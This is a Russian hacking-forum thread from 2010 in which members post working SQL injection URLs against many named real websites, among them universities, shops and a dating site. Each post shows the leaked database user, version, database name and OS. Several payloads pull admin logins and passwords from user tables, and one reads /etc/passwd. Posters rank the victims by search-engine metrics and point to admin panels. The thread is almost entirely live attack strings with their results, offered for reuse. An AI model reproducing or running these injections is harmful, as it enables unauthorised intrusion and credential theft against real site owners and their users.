Просмотр полной версии : SQL Инъекции
CyberHunter
30.06.2010, 01:25
тИЦ - 60
Code:
http://treeofmoney.ru/pour.php?id=-74034+union+select+1,2,3,concat(user(),version(),d atabase()),5+--+
User: nitsik@localhost
Version: 5.0.90
Database: tree
CyberHunter said:
тИЦ - 60
Code:
http://treeofmoney.ru/pour.php?id=-74034+union+select+1,2,3,concat(user(),version(),d atabase()),5+--+
User: nitsik@localhost
Version: 5.0.90
Database: tree
боян. не проиндексировалась просто.
Code:
http://www.biotruck.co.uk/index.php?men=press+UNION+SELECT+1,concat_ws(0x3a, version(),user(),database()),3+--+
Code:
http://www.onix.by/index.php?m=1&c=-1+UNION+SELECT+1,2,concat_ws(0x3a,version(),user() ,database()),4,5,6,7+--+
Code:
http://www.glavbukh.ru/gbDm.php?id=-2057+'+AND+1=0+UNION+SELECT+1,2,3,concat_ws(0x3a,v ersion(),user(),database()),5+--+
Code:
http://www.kuhnimaster.ru/?id=1005&ibID=-15+'+UNION+SELECT+1,2,3,4,concat_ws(0x3a,user(),ve rsion(),database()),6,7,8,9,10,11,12,13,14,15,16,1 7+--+
Code:
http://www.iaath.com/news_anno_view.php?id=-78+UNION+SELECT+1,2,3,concat_ws(0x3a,version(),use r(),database()),5,6,7+--+
Code:
http://www.collaborativeagency.com/speaker.php?Num=21366+UNION+SELECT+1,concat_ws(0x3 a,version(),user(),database()),3,4,5,6,7,8,9,10,11 ,12,13++--+
и опять же КОСТРОМА
http://k156.ru/sprav/catview.php?cat_id=-2+and+1=2+union+select+1,2,concat_ws(0x3a,version( ),user(),database(),@@version_compile_os),4,5,6,7, 8,9,10,11,12,13,14,15,16,17,18--
version : 5.0.32-Debian_7etch12-log
user : kostroma_org@77.221.130.2
database : kostroma_org
os : pc-linux-gnu
Code:
http://www.qpflowers.ru/raskazread.php?idArticle=-17+union+select+concat%28user%28%29,version%28%29, database%28%29%29,2,3%20--
version : 4.0.27-max-log
database : autoanry_cvet
user : autoanry_cvet@v24.valuehost.ru
http://www.spectrum-watches.com/new.php?id=-2+union+select+1,2,3,group_concat(0x0b,name,0x3a,p assword),5,6,7+from+users--&usernews=
ПР 4
http://www.grow3c.com/contact_popup.php?id=-2+union+select+1,concat_ws(0x3a,email, password),3, 4+from+member/*
http://www.logos-pravo.ru/article.php?id=-82'+union+select+1,2,3,4,5,6,7,concat_ws(0x3a,vers ion(),database(),user(),@@version_compile_os),9,10 ,11,12,13,14+--+&root=23
Database Version: 5.0.26-log
Database name: logospravo
User name: logospravo@localhost
Os: linux
fenixelite
01.07.2010, 13:14
Code:
http://www.teachshop.ru/?news=-1+Union+Select+1,2,concat_ws%280x3a,login,passw%29 ,4+from+ts_user+--
Тиц 2500
http://www.vch.ru/cgi-bin/guide.cgi?table_code=44&action=show&id=-1065+union+select+concat_ws(0x3a,version(),databas e(),user(),@@version_compile_os),2,3
5.0.79:wwwcust:wwwcust@localhostc-linux-gnu
[Feldmarschall]
01.07.2010, 15:03
http://www.lomospain.com/tienda/detalle.php?id=-235+union+select+1,2,3,version%28%29,5--
Version: 4.1.20
Database: lomospain
User: lomospain@localhost
http://yahoo.jponline.ru/main.php?id=2084048437+and+substring(version(),1,1 )=5
МОСТУРФЛОТ
http://www.mosturflot.ru/seacruises/ships/index.php?ship_id=-80+and+1=2+union+select+1,concat_ws(0x3a,@@version ,user(),database(),@@version_compile_os),3,4+--
version : 5.0.83
user : mosturflot@localhost
database : mosturflot
os : alt-linux-gnu
http://www.mosturflot.ru/seacruises/ships/index.php?ship_id=-80+and+1=2+union+select+1,concat_ws(0x3a,name,user name,password,email),3,4+from+j_users+limit+0,1--
root_sashok
02.07.2010, 13:33
Code:
http://www.windowware.co.uk/product_list.php?m=-1+union+select+1,2,user(),database(),5,6,7,8,versi on(),10--
User: windowweb
Database: ww_sys@localhost
Version: 4.1.22
Я вернулся
Code:
http://www.aspect.dubna.ru/new/page.php?page=301+union+select+concat_ws(0x3a,user (),version(),database())--
User: aspect@localhost
Database: aspect
Version: 5.0.51a-log
PR 4
Code:
http://www.pritchi.net/modules/arms/index.php?cat=-1+union+select+concat_ws%280x3a,user%28%29,version %28%29,database%28%29%29,2,3%20--
user : shurko@localhost
version : 4.1.20
database : www_pritchi_net_-_pritchi
http://www.retirevic.com.au/about.php?id=-3+union+select+1,2,3,group_concat(0x0b,user_id,0x3 a,user_password)+from+rv_auth_user--
http://www.outrest.ru/board/board-bike/index.php?oid=-792+and+1=2+union+select+1,2,3,concat_ws(char(58), @@version,user(),database(),@@version_compile_os), 5,6,7,8,9,10,11,12--
version : 4.1.22-lk-log
user : collspbru_rest@localhost
database : collspbru_rest
0s : pc-linux-gnu
Host Information
Server = Apache
Version = 5.1.45-1~bpo50+1-log
Powered by = PHP/5.2.6-1+lenny8
Attack Type = SQL Union Injection
Current User = gspatialhistory5@www04.Stanford.EDU
Current Database = g_spatialhistory_shwebsite
Supports Union = yes
Union Columns = 16
Vuln: http://www.stanford.edu/group/spatialhistory/cgi-bin/site/viz.php?id=121+and+1=0+ Union Select 1,2, UNHEX(HEX([visible])) ,4,5,6,7,8,9,10,11,12,13,14,15,16
Code:
http://zoolinks.info/info.php?id=1+union+select+1,2,3,4,table_name,6,7+ from+information_schema.tables+limit+0,1%20--
user : webtrudi_zoo@89.149.244.210
version : 5.0.37-standard
database: webtrudi_zoo
os : pc-linux-gnu
http://vlauto.ru/cars/index.php?idbrand=-9+and+1=2+union+select+1,2,3,4,5,6,7,8,9,10,concat _ws(0x3a,@@version,user(),database(),@@version_com pile_os),12+--&id=2
version : 5.0.91-community-log
user : vlautoru_auto@localhost
atabase : vlautoru_db
os : unknown-linux-gnu
ТИЦ 30 ПР 4
http://www.stroika.md/detail.php?id=-1703+union+select+1,2,3,concat_ ws(0x3a,user,password),5,6,7 ,8+from+mysql.user--
вывод в тайтл
Моя первая
http://www.worstpreviews.com/headline.php?id=-17072+union+select+1,version(),3,4,5,6,7,8--+
Version: 5.0.90-log
User: alexgi_2@localhost
Database: alexgi_worstreview@localhost
-------------------------------------------------------------------------------------------------
и еще одна
http://www.steinerbooks.org/p.php?id=-11+union+select+1,version()29,3,4,5,6,7,8,9--+
version: 4.1.22
user:anthroposophic@localhost
---------------------------------------------------------------------------------------------------
http://www.giuciao.com/books/book.php?id=-3748+union+select+1,concat_ws(0x3a,version(),user( )),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20, 21,22,23,24,25--+
version: 5.0.32-Debian_7etch5
user: bookhtml93843@217.64.202.205
http://www.wscal.edu/bookstore/store/details.php?id=-2022+union+select+1,concat_ws(0x3a,user(),version( )),3,4,5,6,7,8,9,10,11--+
wmsem28_wmsem28@localhost:4.0.27-standard
root_sashok
04.07.2010, 16:14
Code:
http://www.barcelo.edu.ar/vernoticia.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,unhex(hex(conc at_ws(0x3a,user(),version(),database()))),12,13,14 ,15,16,17,18,19,20,21--
Username: uv0001@localhost
Version: 4.1.14-log
Database: uv0001_barcelo
Code:
http://www.ms.edu.mn/index.php?option=user_com_sambar&parent=5&id=4&menu_id=5+union+select+1,2,3,unhex(hex(concat_ws(0 x3a,user(),version(),database()))),5,6,7,8--
Username: mat@localhost
Version: 5.0.75-0ubuntu10.2
Database: mathweb
Дальнейшая информация только в ознакомительных целях. Ответственности за Ваши действия я не несу.
Доступны данные из таблицы v2_users.
Code:
http://www.ms.edu.mn/index.php?option=user_com_sambar&parent=5&id=4&menu_id=5+union+select+1,2,3,4,concat_ws(0x3a,user _name,password),6,7,8+from+v2_users--
Tables:
Code:
v2_abouts
v2_artgallery
v2_artpicture
v2_banner
v2_banner_list
v2_comment
v2_components
v2_contact
v2_feedback
v2_gallery
v2_gallery_tech
v2_hevlel
v2_lesson
v2_menu
v2_news
v2_open
v2_permission
v2_picture
v2_position
v2_professor
v2_professor_type
v2_promenu
v2_research
v2_sambar
v2_sent_message
v2_site_banner
v2_site_banner_list
v2_slide
v2_subsystems
v2_theachers
v2_update_type
v2_updates
v2_user2type
v2_user_type
v2_users
v2_web
v2_weblink
v2_weblink_type
v2_work
v2_zarlal
Code:
http://www.ptoservis.ru/photo.php?id=2525+union+select+1,concat_ws(0x3a,us er(),database(),version()),3,4--
Username: u45581@10.10.11.45
Version: 5.0.67-log
Database: u45581
Code:
http://www.litinstitut.ru/index.php?p=gallerypic&img_id=-1+union+select+1,2,3,4,5,6,database(),8,9--
Username: root@localhost
Version: 4.1.22-community-nt
Database: site
BrainDeaD
04.07.2010, 18:17
Code:
http://трансгарант.рф/en/press-center/press-release/index.php?id=911+union+select+1,2,3,4,concat_ws(0x 3a,database(),version(),user()),6,7,8,9
database:wwwtransgarantlg
version:4.0.25
user:transgar@bux.hc.ru
Code:
http://www.metaltorg.ru/catalogue/show.php?id=-22533+union+select+1,version() --
5.0.67-log
Code:
Account
Account_Banner
Account_Restriction
Admin
Ban_Place
Ban_Type
Banner
Banner_Restriction
Censor
Cli
Code:
http://www.metaltorg.ru/catalogue/show.php?id=-22533+union+select+1,concat_ws%280x3a,Adm_login,Ad m_Password%29+from+banner.Admin --
PR5
root_sashok
04.07.2010, 20:08
Code:
http://www.aladeo.ru/video/show.php?id=-1+union+select+1,2,3,4,concat_ws(0x3a,user(),versi on(),database()),6,7,8,9,10,11--
Username: Eugene@localhost
Version: 5.0.45-community-nt
Database: artvideo2
Tables:
Code:
pma
table
info
Code:
http://www.olimpgroup.ru/index.php?ob=list_one&id=-1+union+select+1,concat_ws(0x3a,user(),version(),d atabase()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,1 8,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34, 35,36,37,38,39,40--
Username: olimpgro@localhost
Version: 4.1.25-log
Database: wwwolimpgroupru
Code:
http://izottex.ru/index.php?page=page&id=-1+union+select+1,2,3,4,5,concat_ws(0x3a,user(),ver sion(),database(),@@version_compile_os),7--
Username: neosphru_iztx@localhost
Version: 5.0.26-log
Database: neosphru_iztx
OS: pc-linux-gnu
Code:
http://www.gilsf.ru/order/?comid=-1+union+select+1,concat_ws(0x3a,user(),version(),d atabase(),@@version_compile_os),3,4,5,6,7,8,9,10,1 1,12,13--
Username: u68927@10.8.0.129
Version: 5.0.90-log
Database: u68927
OS: portbld-freebsd7.2
Таблицы выводить лимитом.
ГородРязань.ru
http://www.gorod.ryazan.ru/catalog/index.php?category=-2+and+1=2+union+select+1,2,concat_ws(0x3a,@@versio n,user(),database(),@@version_compile_os),4,5+--
version : 4.1.22-standard-log
user : gorodry_ght@localhost
database : gorodry_ctlg
os : pc-linux-gnu
jecka3000
04.07.2010, 22:35
Code:
http://www.profileracing.com/news_full.php?id=-1001+union+select+concat(version(),0x20,database() ,0x20,user()),2,3,4,5,6,7--
5.1.47-community-log
profiler_web
profiler_webuser@localhost
Code:
http://depts.washington.edu/engl/people/profile.php?id=-29+union+select+concat(version(),0x20,database(),0 x20,user()),2,3--
5.0.27-standard
engl
englbrowser@depts01.u.washington.edu
Code:
http://library.uncc.edu/knowledgebase/question.php?q=-317+union+select+1,concat(version(),0x20,database( ),0x20,user()),3,4,5,6,7,8,9--
5.0.32-Debian_7etch8-log
silk
mozilla@localhos
Code:
http://support.pa.msu.edu/howto.php?id=-95+union+select+1,concat(version(),0x20,database() ,0x20,user()),3,4,5,6,7,8,9,10,11,12,13,14--
5.0.77
supportsite
smgr@force.pa.msu.edu
Code:
http://www.worstpreviews.com/headline.php?id=-17882+union+select+1,concat(version(),0x20,databas e(),0x20,user()),3,4,5,6,7,8--
5.0.90-log
alexgi_worstreview
alexgi_2@localhost
Code:
http://dl.lib.brown.edu/francophone/browse2.php?id=-4+and+1=2+union+select+1,2,3,4,5,6,7,8,unhex(hex(c oncat(version(),0x20,database(),0x20,user())))--+
4.1.22
francophone
guest@localhost
http://www.mgwalk.com/Temp_Topic_View.php?ID=-16+union+select+1,concat(username,0x20,user_passwo rd,0x20,user_type),3,4,5,6,7,8,9,10,11,12,13,14+fr om+phpbb_users+limit+1,1--
http://campus.augustana.edu/acknowledge/template.php?id=-418+union+select+1,2,concat(username,0x20,password ),4,5,6,7,8+from+alumniadmin.users+limit+1,1--
http://ebusiness.byu.edu/book_review.php?ID=-6+union+select+1,concat(password,0x20,netID),3,4,5 ,6,7,8,9,10+from+wd_user+limit+7,1--
Code:
http://rybalka.zooclub.ru/indexr.php?id=-5+union+select+table_name,2+from+information_schem a.tables --
user : zooclub_zooclub@localhost
version : 5.0.91-community-log
database : zooclub_rybalka
http://www.okfurniture.com/news.php?id=-17+union+select+1,2,3,group_concat(id,char(58),use rname,char(58),password)+from+ok_admins
http://alliance.la.asu.edu/azga/news.php?id=-66+union+select+1,concat_ws%280x3a,version(),user( )),3,4,5,6,7+from+mysql.user--+
5.0.75-0ubuntu10.3:gph211@localhost
Как бы боян, ну у тебя скуля в другом месте просто.
шоп стим игор
Code:
http://keybox.com.ua/?m=8+and+1=0+union+select+1,concat_ws%280x3a,versi on(),user( )),3--+
5.0.90-community:vikt_1@localhost
CyberHunter
05.07.2010, 14:05
http://www.healthbynaturalhelp.info/index.php?action=view_article&id=1&module=articlemodule&id=-1+union+select+1,2,3,4,5,6+--+
User: dbo278217868@74.208.16.246
Database: db278217868
Version: 5.0.81-log
PageRank: 2
------------------------
http://www.npspb.ru/index.php?action=view_article&id=21&module=articlemodule&id=-1+union+select+1,2,3,4,5,6+--+
User: admin_db@localhost
Database: EXP_NPSPB
Version: 4.1.18
PageRank: 3
CY: 30
------------------------
http://www.thrive-pt.com/index.php?action=view_article&id=5&module=articlemodule&id=-1+union+select+1,2,3,4,5,6+--+
Database: thriveptdb
Version: 5.0.83-log
User: wda4cb@cgi1103.int.bizland.net
PageRank: 2
------------------------
http://www.arabhorsesociety.com/index.php?module=articlemodule&action=view_article&id=-5+union+select+1,2,3,4,5,6+--+
Database: argoshil
User: argoshil@209.235.156.31
Version: 4.1.22-standard
PageRank: 4
------------------------
http://www.kahuarecords.com/index.php?action=view_article&id=11&module=articlemodule&id=-1+union+select+1,2,3,4,5,6+--+
Database: mauirtrt_exp_nscms
User: mauirtrt_nsexp@localhost
Version: 5.0.51a-community
PageRank: 3
------------------------
http://www.eberhartsigns.net/index.php?action=view_article&id=3&module=articlemodule&id=-1+union+select+1,2,3,4,5,6+--+
Database: eberhartsigns
User: eberhartsigns@localhost
Version: 5.0.24a-standard
------------------------
http://www.bristolpegasus.com/index.php?action=view_article&id=9&module=articlemodule&id=-1+union+select+1,2,3,4,5,6+--+
Database: bristolp_exponentcms
User: bristolp_cms@localhost
Version: 5.0.89-community
Pagerank: 3
------------------------
http://moreversatile.com/index.php?action=view_article&id=4&module=articlemodule&id=-1+union+select+1,2,3,4,5,6+--+
Database: vmsnet_mvEXP
User: vmsnet_MVMS@localhost
Version: 5.0.51a-community
------------------------
http://www.ascensionhealing.sg/web/index.php?action=view_article&id=117&module=articlemodule&id=-1+union+select+1,2,3,4,5,6+--+
Database: providem_as4
User: providem_ah4@localhost
Version: 4.1.22-standard
PageRank: 2
------------------------
CyberHunter
05.07.2010, 19:03
http://www.aprileonline.info/notizia.php?id=-14209+union+select+1,2,3,4,5,6,7,8,concat(user(),v ersion(),database()),10,11,12,13,14,15,16,17+--+
User: aprile_info@localhost
Database: aprileonline_info
Version: 5.0.27
PageRank: 5
CY: 20
Admin Panel: http://www.aprileonline.info/administrator/
Users: http://www.aprileonline.info/notizia.php?id=-14209+union+select+1,2,3,4,5,6,7,8,group_concat(us ername),group_concat(password),11,12,13,14,15,16,1 7+from+_users--+
Пароли такие же как и логины. Шелл льется, вот только нет прав ни на что.
-------------------------
http://www.articolo21.org/notizie/-10+union+select+1,2,3,4,5,6,7,8,concat(user(),vers ion(),database()),10,11,12,13,14,15,16,17+--+/1_audio-notizie.html
User: elzevira21@localhost
Database: articolo21_info
Version: 5.0.77
PageRank: 6
CY: 10
Admin Panel: http://www.articolo21.org/administrator/
-------------------------
ПОМОРСКАЯ ЯРМОРКА
http://www.pomfair.ru/news.php?page=news&podr=-54+and+1=2+union+select+1,concat_ws(char(58),@@ver sion,user(),database(),@@version_compile_os),3,4+--
version : 5.0.32-Debian_7etch12-log
user : z104082_pfair@77.221.130.24
database : z104082_pfair
os : pc-linux-gnu
http://www.fotoline.ru/goods.php?id=-296+union+select+1,2,3,4,5,concat_ws(0x3a,version( ),user(),database(),@@version_compile_os),7,8,9,0, 1,2/*
4.1.22-standard:fotoline_foto@localhost:fotoline_shopc-linux-gnu
http://www.moy-pes.ru/view_dekor.php?id=-1'+union+select+1,concat_ws(0x3a,version(),user(), database()),3,4,5--+
version:5.0.67-percona-highperf-b7-log:
user:cobra666@localhost:
database:cobra666_moy-pes@localhost
CyberHunter
05.07.2010, 22:51
----------------------
http://nicoteraroofing.com/index.php?action=view_article&id=1&module=articlemodule&id=-1+union+select+1,2,3,4,5,6+--+
User: nr_exponent@208.109.14.77
Database: nr_exponent
Version: 5.0.91-log
----------------------
http://www.earthrace.net/index.php?action=view_article&id=60&module=articlemodule&id=1&module=articlemodule&id=-1+union+select+1,2,3,4,5,6+--+
User: earthrace_db@localhost
Database: earthrace_cms
Version: 4.1.22-standard
PageRank: 5
CY: 10
----------------------
http://www.adozionepercorsi.it/index.php?action=view_article&id=37&module=articlemodule&id=-1+union+select+1,2,3,4,5,6+--+
User: Sql210476@62.149.141.97
Database: Sql210476_1
Version: 5.0.91-enterprise-gpl-log
PageRank: 2
----------------------
http://www.langanesbyggd.is/category.php?catID=-17+union+select+1,2,3,4,5,6,7
PR-5
----------
http://www.decode.com/news/news.php?story=-142+union+select+1,2,3,4
OS : Red hat
PR-7
тИЦ-50
ТИЦ 110 ПР 2
http://magput.ru/?id=10&viewprog=4177+union+select+concat_ws(0x3a,login, pass)+from+db _magput.users--
вывод в исходник, в кнопочку "Посмотреть наличие мест"
magadmin.ru/admin
winstrool
06.07.2010, 13:26
http://www.worlddancenewyork.com/artist-details.php?artistid=-40+union+select+1,2,3,4,5,version(),7,8
5.0.91-community
ТИЦ: 0
PR: 5
artist_featured
artists
categories
news
pro_featured
pro_related
pro_reviews
products
products_details
topsellers
http://niksplus.ru/index.php?id_=2+union+select+1,2,3,4,concat_ws(0x3 a,login,pass word),6,7,8,9, 10,11,12+from+ users--
хотя тут скуля не нужна:
http://niksplus.ru/phpmyadmin/main.php
http://www.beautycall.co.uk/gallery.php?id=-1+union+select+1,2,concat_ws(0x3a,version(),databa se(),user())--
5.0.67:beautycall_co_uk_webmowat@localhost
http://www.beautycall.co.uk/forum (phpbb_users)
PR3
Leone_510
07.07.2010, 01:19
Code:
http://www.storycenter.org/stories/index.php?cat=-8/**/union/**/select/**/1,2,3,4,5,concat(version(),0x3b,user(),0x3b,databa se()),7/*
4.1.25-Debian_mt1;db3911_sc@64.13.192.29;db3911_theater
Leone_510
07.07.2010, 01:48
Code:
http://www.pellami.ru/show.php?cat=1+union+select+1,2,concat(version(),0 x3b,user(),0x3b,database()),4,5--
5.0.90;pellamiru@78.108.81.131;pellamiru
PHP:
http://goldenformula.net/news.php?id=-6+union+select+1,2,3,4,concat_ws(0x3a,version(),da tabase(),user()),6--
http://goldenformula.net/news.php?id=-6+union+select+1,2,3,4,concat_ws(0x3a,username,pas sword),6+from+jos_users+limit+0,1--
5.0.90-log:u141047:u141047_gf@10.8.0.112
ТИЦ130
PR3
Code:
http://www.ukfinewatches.com/buy.php?id=-33+union+select+1,2,3,4,5,version(),database(),8,9 ,10,11,12,13,14,15,16,17,18,user()--
Getty said:
Code:
http://www.ukfinewatches.com/buy.php?id=-33+union+select+1,2,3,4,5,version(),database(),8,9 ,10,11,12,13,14,15,16,17,18,user()--
молодец, копипастить умееш(http://forum.xakep.ru/fb.aspx?m=1929370) только копипаст у нас в другом разделе
architecture.mit.edu
PageRank 7/10
root@localhost*5.0.37*mit_doa
HTML:
http://architecture.mit.edu/news-events.php?evt=-58+union+select+1,2,load_file('/etc/passwd'),4,5,6,concat_ws(0x2a,user(),version(),dat abase()),8,9,10,11,12,13--
Компания Genesys Logic http://www.incentia.com/images/customers/genesyslogic_logo.jpg
http://www.genesyslogic[antigoogle].com/_en/product_01_1.php?id=-26+union+select+1,concat(username,char(58),passwor d),3,4,5,6,7,8,9,10,11+from+admin
OS : Red Hat
PR-5
Тиц-60
http://www.aeroprize-n.ru/dom.php?ID=-182+union+select+1, 2,version()--
http://realty.south.ru/dom.php?id=-217+union+select+version()-- ТИЦ 425 ПР 4
качественные окна KALEVA
http://www.okna.ru/news/?id=-132+and+1=2+union+select+1,2,3,4,concat_ws(char(58 ),@@version,user(),database(),@@version_compile_os ),6,7+--
version : 5.1.45-log
user : root@localhost
database : oknaru
os : portbld-freebsd8.0
-PRIVAT-
09.07.2010, 20:18
http://www.bulgaria-st.ru/dom.php?id=-195+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14, 15,16,17,18,19,20,21,22,23,24
USER-bulgari7_SNT@localhost
VERSION()-4.1.25-log
Мой первый сайт из РУнета.
http://neoklimat.ru/faq.php?id=-923+union+select+1,concat_ws%280x3a,version%28%29, user%28%29%29,3,4
USER-u180296_woll@10.8.0.113
VERSION()-5.0.90-log
ТИЦ-10
http://woll-rus.ru/faq.php?id=-913+union+select+1,concat_ws%280x3a,version%28%29, user%28%29%29,3,4%20--
USER-u180296_woll@10.8.0.113
VERSION()-5.0.90-log
ТИЦ-10
http://www.lifeskillstraining.com/faq.php?id=-4+union+select+1,group_concat%28id,0x3a,username,0 x3a,password,0x3c62723e%29,3,4+from%20admin --
/\
Это выведет логины и пароли админовUSER-p253j7ml_lstdb@localhost
VERSION()-5.0.67-community
PR-6
http://www.citrox.net/faq.php?id=-161+union+select+1 --
PR-4
PHP:
http://www.compudrug.com/show.php?id=-8+union+select+1,2,3,4,concat_ws(0x3a,version(),da tabase(),user()),6,7,8,9,10,11,12,13,14--
5.0.38-Ubuntu_0ubuntu1.4-log:compudrug:pentacom@localhost
PR5
-PRIVAT-
10.07.2010, 10:58
http://www.uso.ru/pg.php?id=-45+union+select+1,concat_ws%280x3a,username,passwd ,permis%29,3,4,5,3,7,8+from+adms%20-- --
/\
Это выведет логины и пароли админовUSER-salutsu_uso@localhost
VERSION()-5.0.51a-24+lenny3
PR-2
ТИЦ-20
http://www.budaphone.com/press.php?id=-1+union+select+1,user%28%29,version%28%29,4%20--
USER-budaphon@zvm1.host.ru
VERSION()-4.0.27-log
PR-3
ТИЦ-40
БОЯН
USER-vmaldives@68.178.254.104
VERSION()-4.1.24-max-log
PR-6
ТИЦ-50
http://www.sharsheret.org/faq.php?ID=-30+union+select+1,2 --
USER-sharsheret@208.109.14.103
VERSION()-4.0.30-max-log
PR-6
ТИЦ-50
http://www.gourditas.com/heart.php?id=-45+union+select+1,concat_ws%280x3a,version%28%29,0 x3a,user%28%29%29,3,4 --
USER-hightheo_jnegro@localhost
VERSION()-4.1.22-standard
http://m2.irkutsk.ru/terra/terra.php?id=-1273570566+union+select+1,concat_ws%280x3a,id=1,0x 3a,login,0x3a,0x3a,password%29,3,4,5,6,7,8,9,10,11 ,12,13,14,15,16,17,18,19,20,21,22+from+2bsoft6_use rs+Where+id=1%20--
/\
Это выведет логины и пароли админовUSER-u19786@10.10.10.228
VERSION()-5.0.67-log
PR-3
ТИЦ-1900
http://www.phada.org/job.php?id=-2475+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14 %20--
USER-phada_ksenzee@localhost
VERSION()-4.1.22-standard
PR-3
ТИЦ-40
http://www.lcgh.net/job.php?job_id=-33+union+select+1,2,version%28%29,4,user%28%29 --
USER-lcgh@localhost
VERSION()-5.0.45-community-nt
PR-4
http://www.toddjobs.com/job.php?ID=-125+union+select+1,2,3,4,5,user%28%29,7,8,9,10,11, 12,13,version%28%29 --
USER-browns01@64.71.32.51
VERSION()-4.1.22-standard-log
PR-3
winstrool
10.07.2010, 17:33
http://indiauktravel.co.uk/more.php?id=-1+union+select+1,2,3,4,5,concat_ws(0x3a,uname,pass ,name,email),7+from+admin--&contentid=1
http://www.prodazhadvd.com/catalog/store/more.php?id=-5305+union+select+1,2,version(),4,5,6,7,8,9,0,11,1 2,13,14,15,16,17,18,19,20,21,22,23--
знакомства в нижнем новгородеwww.love.r52.ru/
http://www.love.r52.ru/view.phtml?type=gtob&s=-1+and+1=2+union+select+1,2,3,4,5,6,7,concat_ws(0x3 a,@@version,user(),database(),@@version_compile_os ),9,10,11,12,13,14,15,16,17,18,19,20,21,22+--
version : 5.0.51a
user : love@localhost
database : love
os : portbld-freebsd7.0
http://www.love.r52.ru/view.phtml?type=gtob&s=-1+and+1=2+union+select+1,2,3,4,5,6,7,concat_ws(0x3 a,name,pass),9,10,11,12,13,14,15,16,17,18,19,20,21 ,22+from+forum_user--
emillord
10.07.2010, 22:40
http://www.firstfordrivers.co.uk/job-seekers/view-job.php?id=8+union+select+1,2,3,4,concat_ws(0x3a,v ersion(),user(),database(),@@version_compile_os),6 ,7,8,9,10,11,12,13,14,15--+
PR3
OS: linux-gnu
User: firstfor_first@localhost
Version: 5.0.91-community
Database: firstfor_firstfor
http://www.claireducharme.com/journal.php?id=-00001+union+select+1,concat_ws(0x3a,version(),user (),database(),@@version_compile_os)
PR1
OS - linux-gnu
User - ducharme@68.178.211.41
Version - 4.0.30-max-log:
Database - ducharme
http://jasonhanson.net/journal.php?id=-26+union+select+1,2,3,concat_ws%280x3a,version%28% 29,user%28%29,database%28%29,@@version_compile_os% 29,5--+
OS: pc-linux-gnu
User: jason_home@localhost
Version: 4.1.22-standard
Database: ason_dev
http://onyourmoney.com/journal.php?id=-104+union+select+1,2,3,concat_ws(0x3a,version(),da tabase(),user(),@@version_compile_os)
PR5
OS: debian-linux-gnu
User: onmoney_benfran@localhost
Version: 5.0.51a-24+lenny3-log
Database: onmoney_onyourmoney
emillord
11.07.2010, 16:33
http://www.vintil.ru/faq.php?id=-917+union+select+1,concat_ws%280x3a,version%28%29, database%28%29,user%28%29,@@version_compile_os%29, 3,4,5--+
OS: portbld-freebsd7.2
User: u180296@10.8.0.113
Version: 5.0.90-log
Database: u180296_vintil
-PRIVAT-
11.07.2010, 21:11
http://www.windward-islands.net/crewed/yacht-us.php?ID=-311+union+select+1,version%28%29,3,user%28%29,5,6, 7,8,9,@@version_compile_os,11,12,13,14,15,16,17,18 ,19 --
USER-sailing@localhost
VERSION()-5.0.51a-log
OS()-portbld-freebsd6.3 passengers maximum
PR-4
ТИЦ-10
http://www.engeniustech.com.sg/faq.php?ID=-9+union+select+1,2,3,4,concat_ws%280x3a,user%28%29 ,version%28%29,@@version_compile_os%29 --
USER-engeniusdbuser@localhost
VERSION()-5.0.77
OS()-redhat-linux-gnu
PR-3
http://www.colesbay.com.au/food.php?id=-8+union+select+1,2,3 --
ТИЦ-10
PR-4
emillord
11.07.2010, 23:17
http://www.vedatransit.com/page.php?issue_id=-3+union+select+1,2,3,4,5,concat_ws%280x3a,@@versio n_compile_os,user%28%29,version%28%29,database%28% 29%29,7,8,9,0,1--+&parent_id=0
ТИЦ10 PR2
OS: portbld-freebsd6.3
User: vedatransitcom@localhost
Version: 5.0.90:
Database: vedatransitcom
http://www.comtid.com/catalog.php?id=-41+union+select+1,2,concat_ws%280x3a,@@version_com pile_os,user%28%29,version%28%29,database%28%29%29 ,4,5,6,7,8--+&action=show_object
ТИЦ10 PR2
OS: portbld-freebsd6.3
User: comtidcom@localhost
Version: 5.0.90
Database: comtidcom
http://www.nlpfurniture.com/catalog.php?id=-4+union+select+1,concat_ws%280x3a,@@version_compil e_os,user%28%29,version%28%29,database%28%29%29,3, 4,5,6,7,8,9,0,1,2,3--+
ТИЦ0 PR4
OS: unknown-linux-gnu
User: nlpfurniture@dish4091.net.ibizdns.com
Version: 5.0.22-standard
Database: nlpfurniture
http://belaquilon.com/catalog_page.php?id=0+union+select+1,2,3,4,5,6,7,8 ,9,0,1,2,3,4,5,6,concat_ws%280x3a,@@version_compil e_os,user%28%29,version%28%29,database%28%29%29,8, 9,0--+
PR3
OS: unknown-linux-gnu:
User: belaquilon@localhost
Version: 5.1.44-community-log
Database: victor_belaquilon
p/s вроде не боян т.к засветился домен в зоне .by только, а этот в .com
http://ozscooter.com/catalog.php?id=20&c_id=-8+union+select+concat_ws%280x3a,@@version_compile_ os,user%28%29,version%28%29,database%28%29%29--+
PR0
OS: unknown-linux-gnu
User: ozsbhak6_admin@localhost
Version: 5.0.90-community
Database: ozsbhak6_ozscooter
http://www.stylisdesigns.com/catalog.php?ID=-79+union+select+1,2,3,concat_ws%280x3a,@@version_c ompile_os,user%28%29,version%28%29,database%28%29% 29,5,6,7,8,9,0,1,2,3,4,5--+
PR0
OS: redhat-linux-gnu
User: swdata@localhost
Version: 4.1.22
Database: stylis
предприятия перерабатывающего комплекса уральской горно-металлургической компании
http://www.ocm.ru/ru/index.php?id15=-8681+and+1=2+union+select+1,2,3,4,5,6,7,8,concat_w s(char(58),version(),user(),database(),@@version_c ompile_os),10,11,12,13,14,15,16,17,18--
version : 4.1.22
user : ummc@localhost
database : ummc
os : portbld-freebsd6.2
http://www.socwall.com/browse/wpDL.php?wp_id=018504+union+select+1,2,3,4,5/*
P.S. клевый сайтик с картинками
Gar|k: Konqi на то я ее сюда и поместил, самому раскручивать лень, кому надо тот пусть и занимается
Shram-spb
12.07.2010, 04:22
Code:
http://www.swing-kiska.ru/modules.php?name=News&new_topic=-6'+union+sel ect+1,2,3,concat_ws (':',user_email,user_password,user _icq,femail,user_id,name),5,6,7,8,9,0,1,2,3,4,5,6+ fro m+start nuke_users/*
43k пользователей
-PRIVAT-
12.07.2010, 10:38
